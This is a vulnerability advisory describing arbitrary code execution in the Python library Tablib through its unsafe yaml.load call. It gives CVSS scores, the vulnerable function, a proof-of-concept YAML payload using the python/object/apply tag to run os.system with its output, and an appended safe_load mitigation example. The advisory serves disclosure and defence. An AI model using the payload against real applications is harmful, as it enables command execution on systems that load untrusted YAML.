Talos Intelligence - TALOS-2017-0307
Jun 13, 2017 - 12:00 a.m.

Tablib Yaml Load Code Execution Vulnerability

2017-06-13 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS2: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.028 Low
Percentile: 90.7%

Summary

An exploitable vulnerability exists in the Databook loading functionality of Tablib. A Databook loaded from YAML can execute arbitrary Python code, resulting in command execution. An attacker can embed Python in the loaded YAML to trigger this vulnerability.

Tested Versions

Tablib v0.11.4

Product URLs

https://pypi.python.org/pypi/tablib

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Details

Tablib is a Python dataset library for generating various tabular formats from data in a format-agnostic way. It is also the main driver behind the django-import-export application and library.

tablib/formats/_yaml.py:31
import tablib
import yaml


def import_book(dbook, in_stream):
	"""Returns databook from YAML stream."""

	dbook.wipe()

	# [0] yaml.load with the default loader constructs arbitrary Python
	# objects from !!python/* tags present in the stream
	for sheet in yaml.load(in_stream):  # [0]
		data = tablib.Dataset()
		data.title = sheet['title']
		data.dict = sheet['data']
		dbook.add_sheet(data)

Tablib uses the unsafe yaml.load API [0] to import the YAML stream into the Databook. Because the default loader honours PyYAML's Python-specific tags, the YAML can carry a `!!python/object/apply` directive that executes arbitrary commands.

Exploit Proof-of-Concept

A test leveraging the Tablib API shows the commands being executed:

(tablib) user in ~
In [1]: import tablib

In [2]: databook = tablib.Databook()

In [3]: databook.load('yaml', '!!python/object/apply:os.system ["ls"]')
AUTHORS         HISTORY.rst     MANIFEST.in     NOTICE          build           docs            tablib          test_tablib.py
HACKING         LICENSE         Makefile        README.rst      dist            setup.py        tablib.egg-info tox.ini

Mitigation

Replace yaml.load with yaml.safe_load
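A hardened variant of import_book, written here as an added example rather than Tablib's own code, applies this mitigation and shows the safe loader refusing the tagged document used in the proof of concept while a benign Databook still loads. It depends only on PyYAML and stands in plain tuples for tablib.Dataset; both YAML samples are constructed for the example.

```python
import yaml

# Constructed sample: a benign Databook as Tablib would emit it, a list of
# sheets, each with a title and a list of row mappings.
BENIGN_YAML = """
- title: people
  data:
  - {name: alice, age: 30}
  - {name: bob, age: 25}
"""

# Constructed sample carrying the python/object/apply tag from the advisory.
# yaml.safe_load has no constructor for it and raises before anything runs.
TAGGED_YAML = '!!python/object/apply:os.system ["ls"]'


def import_book_safe(in_stream):
    """Parse a Databook YAML stream with the safe loader.

    Returns a list of (title, rows) tuples. Only plain scalars, lists and
    mappings are ever constructed; any !!python/* tag raises yaml.YAMLError.
    The shape checks reject documents that parse but are not a Databook.
    """
    sheets = yaml.safe_load(in_stream)
    if not isinstance(sheets, list):
        raise ValueError("Databook YAML must be a list of sheets")
    book = []
    for sheet in sheets:
        if not isinstance(sheet, dict) or "title" not in sheet or "data" not in sheet:
            raise ValueError("each sheet needs 'title' and 'data'")
        rows = sheet["data"]
        if not isinstance(rows, list) or not all(isinstance(r, dict) for r in rows):
            raise ValueError("sheet 'data' must be a list of mappings")
        book.append((str(sheet["title"]), rows))
    return book


def rejects_python_tags(in_stream):
    """True if the safe loader refuses the stream with a YAML error."""
    try:
        yaml.safe_load(in_stream)
    except yaml.YAMLError:  # ConstructorError is a YAMLError subclass
        return True
    return False


if __name__ == "__main__":
    print(import_book_safe(BENIGN_YAML))
    print("tagged document rejected:", rejects_python_tags(TAGGED_YAML))
```

Note that PyYAML 6 also makes yaml.load without an explicit Loader a TypeError, but code that passes yaml.Loader or yaml.UnsafeLoader remains exposed; safe_load (or SafeLoader) is the fix regardless of version.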

Timeline

2017-04-18 - Vendor Disclosure
2017-06-13 - Public Release
